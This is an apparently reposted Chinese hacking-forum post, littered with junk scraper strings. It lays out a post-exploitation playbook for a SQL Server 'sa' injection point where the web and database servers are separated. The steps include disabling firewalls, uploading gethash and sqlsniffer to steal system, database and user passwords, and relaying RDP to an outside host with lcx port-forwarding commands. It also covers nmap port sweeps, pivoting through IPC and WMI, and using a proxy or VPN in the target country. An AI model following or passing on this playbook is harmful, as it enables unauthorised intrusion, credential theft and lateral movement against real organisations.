当你碰到SA的注入点,可以执行命令,但是web与数据库分离,你都会怎么做呢,当数据库不服务器不能连接外网的时候,是不是只想着从web搞呢,这篇文章从t00ls转载过来,希望对大家sa权限的注入点数据库web分离提供一些渗透思路。
- i+ K2 d! N* i
- N" [! v: U/ a- r& @; z6 y. A$ q, U0 E9 R$ `
! C8 |* i' \3 |2 o( iSA点,system权限,可执行命令,web和db分离.DB机器不上网(一般指中马不上线,lcx反弹不出)
/ K/ w+ }& M/ D* ]! n6 ~ z2 z% l( k9 `
! z4 e Y' h; W# J& c' E
一、DB机有公网IP.) q/ K, U j6 d
5 M. E& G! V; Y( g/ W- m1:执行命令把系统防火墙和ip策略停止,netstat -an找到3389端口尝试连接.
0 ], v- }5 L H0 [6 s. p/ Y; q) l' R# J8 b* w
B# k1 @% X3 \3 |# X( q$ }2:从内往外扫描.把命令行下的s扫描器转成vbs传上DB机器生成exe扫描外网一台做了端口策略的机器.这台外网机器开放所有端口.(可以到网上找这 样的 机器.) 如果扫描结果有开放端口,证明在这台DB机可以把3389转到外面机器.比如扫到80 那就lcx -slave ip 80 127.0.0.1 3389.( h! H( ~& _; m
) k: f7 Y% I' ^6 b9 V! }4 @# D0 I$ T5 e. t, j
3:尽量多拿密码.用vbs的方法上传gethash,sqlsniffer类的工具.拿到系统和mssql的密 码,数据库表的后台管理员密码,member表的最前几个用户密码.这些密码可以用来测试web后台,web的3389 ftp等.当然事先要对web机器完整扫描一遍. www.2cto.com
2 ?5 A" O+ p0 G9 Y! X1 L* y4 h: i* n- k2 b+ \
0 ~4 v1 U. p5 ~. u
4,nmap扫描.用nmap扫描web和db机器的1-65535端口.如果发现db机器显示有closed的端口.那恭喜你,你可以lcx -tran 把3389转发到该端口直接登陆.firewalk也有类似功能.但对代理防火墙无用.
. [; w( j- Q( h# ~6 G" O/ {& X: I) Z6 P% u6 d+ F
. {5 d$ Z0 u3 [' _
0 r2 ^1 k! K9 M+ T! X$ w二、DB机只有内网IP( f4 y7 Q) U% @& H6 K5 h
; _# d0 ~( y* E! l1:尽量多拿密码来net use到web机器.这个过程需要极大的耐心 , 拿密码尝试登陆web后台等.8 `$ h$ a. E- d& O! {
1 _ a4 F8 t" J( T7 U
' G% m [1 U3 v" U) g' j2:停掉防火墙和IP策略再从内往外扫描.& Q3 H# e* c4 L3 c! X' G. n' X0 _$ f
# O1 [$ m2 a* n I' B) W b* x
! [' u& H+ F: G3: ipconfig /dispalydns如果发现有公网的域名,极大可能是路由做了手脚.机会还是有的.
- c8 Q; k8 d: [& t/ F# |' v4 A, Q4 g& |/ W0 r
- x6 M7 D6 Y5 T5 |
4:学会密码规律分析往往会有惊喜.- x( R% b0 E9 |" }9 v7 v/ x
. l& H9 F. f. C: X
2 {& \' N1 y5 E" |' r5,在sa点里执行命令渗透内网,找可上网的机器.isql,ipc共享,wmi等
- [: }' j% S4 @: c6 u% O+ q" e! R9 k) D$ z+ _" e
; c& b6 `% j# ~3 ]& |) S有些地区或国家会禁止别的国家连接一些端口,所以拥有目标国代理或VPN是很重要的 |